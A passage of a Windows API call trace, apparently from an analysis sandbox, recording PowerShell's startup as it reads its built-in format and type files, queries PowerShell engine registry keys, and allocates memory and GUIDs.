	[0810.638] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.639] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.639] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.640] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.640] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.646] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.649] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.650] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.650] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.651] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.651] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.651] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.652] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1000, lpOverlapped=0x0) returned 1
	[0810.652] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x1b4, lpOverlapped=0x0) returned 1
	[0810.652] ReadFile (in: hFile=0x310, lpBuffer=0x2eba030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d608, lpOverlapped=0x0 | out: lpBuffer=0x2eba030*, lpNumberOfBytesRead=0x22d608*=0x0, lpOverlapped=0x0) returned 1
	[0810.653] CloseHandle (hObject=0x310) returned 1
	[0810.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0810.653] SetErrorMode (uMode=0x1) returned 0x1
	[0810.653] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d580 | out: lpFileInformation=0x22d580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0810.653] SetErrorMode (uMode=0x1) returned 0x1
	[0810.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0810.653] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d668 | out: phkResult=0x22d668*=0x310) returned 0x0
	[0810.654] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d5ec, lpData=0x0, lpcbData=0x22d5e8*=0x0 | out: lpType=0x22d5ec*=0x1, lpData=0x0, lpcbData=0x22d5e8*=0x56) returned 0x0
	[0810.654] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e84d0
	[0810.654] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d5bc, lpData=0x1b9e84d0, lpcbData=0x22d5b8*=0x56 | out: lpType=0x22d5bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d5b8*=0x56) returned 0x0
	[0810.654] CoTaskMemFree (pv=0x1b9e84d0) 
	[0810.654] RegCloseKey (hKey=0x310) returned 0x0
	[0810.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0810.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0818.524] VirtualQuery (in: lpAddress=0x22c350, lpBuffer=0x22d210, dwLength=0x30 | out: lpBuffer=0x22d210*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0822.568] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0822.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0822.568] CoTaskMemFree (pv=0x3cee00) 
	[0825.142] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d808 | out: phkResult=0x22d808*=0x2f4) returned 0x0
	[0825.142] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x22d81c, lpData=0x0, lpcbData=0x22d818*=0x0 | out: lpType=0x22d81c*=0x1, lpData=0x0, lpcbData=0x22d818*=0x74) returned 0x0
	[0825.142] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x22d78c, lpData=0x0, lpcbData=0x22d788*=0x0 | out: lpType=0x22d78c*=0x1, lpData=0x0, lpcbData=0x22d788*=0x74) returned 0x0
	[0825.142] CoTaskMemAlloc (cb=0x78) returned 0x413220
	[0825.142] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x22d75c, lpData=0x413220, lpcbData=0x22d758*=0x74 | out: lpType=0x22d75c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x22d758*=0x74) returned 0x0
	[0825.143] CoTaskMemFree (pv=0x413220) 
	[0825.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x22d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0825.143] SetErrorMode (uMode=0x1) returned 0x1
	[0825.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x22d6e0 | out: lpFileInformation=0x22d6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0825.143] SetErrorMode (uMode=0x1) returned 0x1
	[0825.144] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0825.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0825.144] CoTaskMemFree (pv=0x3cee00) 
	[0828.288] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0828.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.288] CoTaskMemFree (pv=0x3cee00) 
	[0828.288] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0828.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.288] CoTaskMemFree (pv=0x3cee00) 
	[0828.289] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0828.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.289] CoTaskMemFree (pv=0x3cee00) 
	[0828.290] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0828.290] GetFileType (hFile=0x2f8) returned 0x1
	[0828.290] SetErrorMode (uMode=0x1) returned 0x1
	[0828.290] GetFileType (hFile=0x2f8) returned 0x1
	[0828.290] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.293] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.293] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.294] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.295] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.295] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0828.295] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x9e2, lpOverlapped=0x0) returned 1
	[0828.295] ReadFile (in: hFile=0x2f8, lpBuffer=0x3560ea2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3560ea2*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0828.295] ReadFile (in: hFile=0x2f8, lpBuffer=0x3561958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3561958*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0828.296] CloseHandle (hObject=0x2f8) returned 1
	[0828.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0828.296] SetErrorMode (uMode=0x1) returned 0x1
	[0828.296] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0828.296] SetErrorMode (uMode=0x1) returned 0x1
	[0828.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0828.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f8) returned 0x0
	[0828.296] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0828.296] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8460
	[0828.297] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8460, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0828.297] CoTaskMemFree (pv=0x1b9e8460) 
	[0828.297] RegCloseKey (hKey=0x2f8) returned 0x0
	[0828.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0828.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0828.307] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xb4e89112, Data2=0xe050, Data3=0x4602, Data4=([0]=0xa8, [1]=0xbb, [2]=0xe8, [3]=0x74, [4]=0x90, [5]=0x20, [6]=0x50, [7]=0x1d))) returned 0x0
	[0828.323] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x736214d1, Data2=0xae6b, Data3=0x4644, Data4=([0]=0xaa, [1]=0x6c, [2]=0xdf, [3]=0xac, [4]=0xc8, [5]=0xa4, [6]=0xb4, [7]=0x80))) returned 0x0
	[0828.325] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0828.326] GetFileType (hFile=0x2f8) returned 0x1
	[0828.326] SetErrorMode (uMode=0x1) returned 0x1
	[0828.326] GetFileType (hFile=0x2f8) returned 0x1
	[0828.326] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.146] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.146] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.147] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.147] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.149] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0xfb2, lpOverlapped=0x0) returned 1
	[0831.149] ReadFile (in: hFile=0x2f8, lpBuffer=0x358bbda, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358bbda*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0831.149] ReadFile (in: hFile=0x2f8, lpBuffer=0x358c4c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x358c4c0*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0831.150] CloseHandle (hObject=0x2f8) returned 1
	[0831.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0831.150] SetErrorMode (uMode=0x1) returned 0x1
	[0831.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0831.150] SetErrorMode (uMode=0x1) returned 0x1
	[0831.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0831.151] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f8) returned 0x0
	[0831.151] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0831.151] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0831.151] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0831.151] CoTaskMemFree (pv=0x1b9e8310) 
	[0831.151] RegCloseKey (hKey=0x2f8) returned 0x0
	[0831.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0831.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0831.173] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x839adf55, Data2=0x8216, Data3=0x4bca, Data4=([0]=0xa5, [1]=0x5c, [2]=0x47, [3]=0xa1, [4]=0xcf, [5]=0x5b, [6]=0xb4, [7]=0xcb))) returned 0x0
	[0831.178] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xe0a3dbe1, Data2=0xf207, Data3=0x488a, Data4=([0]=0x9d, [1]=0xc4, [2]=0x66, [3]=0xf2, [4]=0xf9, [5]=0x70, [6]=0x42, [7]=0xcd))) returned 0x0
	[0831.180] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc6cf4afc, Data2=0x17fd, Data3=0x49ba, Data4=([0]=0x9c, [1]=0xfc, [2]=0x1c, [3]=0x88, [4]=0x7, [5]=0x55, [6]=0x10, [7]=0x28))) returned 0x0
	[0831.180] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x375ae8bb, Data2=0xc194, Data3=0x4e4b, Data4=([0]=0xa0, [1]=0x2a, [2]=0x1a, [3]=0xc1, [4]=0x1f, [5]=0x7, [6]=0x3e, [7]=0x73))) returned 0x0
	[0831.181] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xecaeeb7d, Data2=0x9937, Data3=0x4584, Data4=([0]=0x81, [1]=0x71, [2]=0x1, [3]=0x15, [4]=0x5a, [5]=0xae, [6]=0x8d, [7]=0xbd))) returned 0x0
	[0831.182] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2230fe08, Data2=0xda4b, Data3=0x44cd, Data4=([0]=0xb8, [1]=0x7a, [2]=0xdf, [3]=0xa1, [4]=0xef, [5]=0xfb, [6]=0x4e, [7]=0x3f))) returned 0x0
	[0831.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0831.183] SetErrorMode (uMode=0x1) returned 0x1
	[0831.183] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0831.183] GetFileType (hFile=0x2f4) returned 0x1
	[0831.183] SetErrorMode (uMode=0x1) returned 0x1
	[0831.183] GetFileType (hFile=0x2f4) returned 0x1
	[0831.183] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0831.184] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0833.590] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0833.590] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0833.590] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
